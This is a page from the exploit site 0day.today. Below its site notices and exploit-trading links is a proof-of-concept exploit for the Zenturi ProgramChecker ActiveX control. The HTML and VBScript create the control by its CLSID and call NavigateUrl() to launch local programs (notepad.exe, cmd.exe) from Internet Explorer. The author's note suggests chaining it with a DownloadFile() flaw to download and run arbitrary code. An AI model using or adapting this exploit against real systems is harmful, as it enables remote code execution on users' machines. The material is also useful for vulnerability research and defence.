0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Zenturi ProgramChecker ActiveX NavigateUrl() Insecure Method Exploit
==================================================================== Zenturi ProgramChecker ActiveX NavigateUrl() Insecure Method Exploit ==================================================================== <pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">----------------------------------------------------------------------------- <b>Zenturi ProgramChecker ActiveX Control "NavigateUrl()" Insecure Method</b> url: http://www.programchecker.com/activeintro.aspx author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 I can't believe my eyes when I see what you can do with this ActiveX (and I can't believe that this product is considered as antispyware). You can use the "NavigateUrl()" to arbitrary launch local file from a pc. Try, for example, to launch "c:\somefile.exe" and see what happen. Imagine to use this method with the "DownloadFile()" one, you can download something on the pc and run it without problems. For the "DownloadFile()" vulnerability see: <a href=http://www.milw0rm.com/exploits/4008>http://www.milw0rm.com/exploits/4008</a> ----------------------------------------------------------------------------- <object classid='clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5' id='test' ></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <script language='vbscript'> Sub tryMe() test.NavigateUrl "notepad.exe" ,"shinnai" ,"_SELF" test.NavigateUrl "cmd.exe" ,"shinnai" ,"_SELF" End Sub </script> </span></span> </code></pre> # 0day.today [2024-12-24] #